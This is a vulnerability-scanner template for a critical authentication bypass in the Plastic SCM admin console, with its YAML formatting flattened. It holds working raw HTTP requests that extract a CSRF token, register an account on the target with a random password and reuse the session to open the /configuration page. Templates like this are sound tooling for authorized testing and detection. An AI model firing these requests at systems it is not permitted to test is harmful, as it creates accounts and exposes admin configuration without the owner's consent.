id: unauthorized-plastic-scm info: name: Plastic Admin Console - Authentication Bypass author: DEENA severity: critical description: A Plastic Admin console was discovered. reference: - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 classification: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-288 tags: plastic,misconfig metadata: max-request: 3 http: - raw: - | GET /account/register HTTP/1.1 {{Hostname}} - | POST /account/register HTTP/1.1 Host: {{Hostname}} Origin: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/account/register Connection: close Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - | GET /configuration HTTP/1.1 {{Hostname}} cookie-reuse: true extractors: - type: regex part: body internal: true group: 1 name: csrf regex: - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' matchers-condition: and matchers: - type: word words: - "Network - Plastic SCM" part: body - type: status status: - 200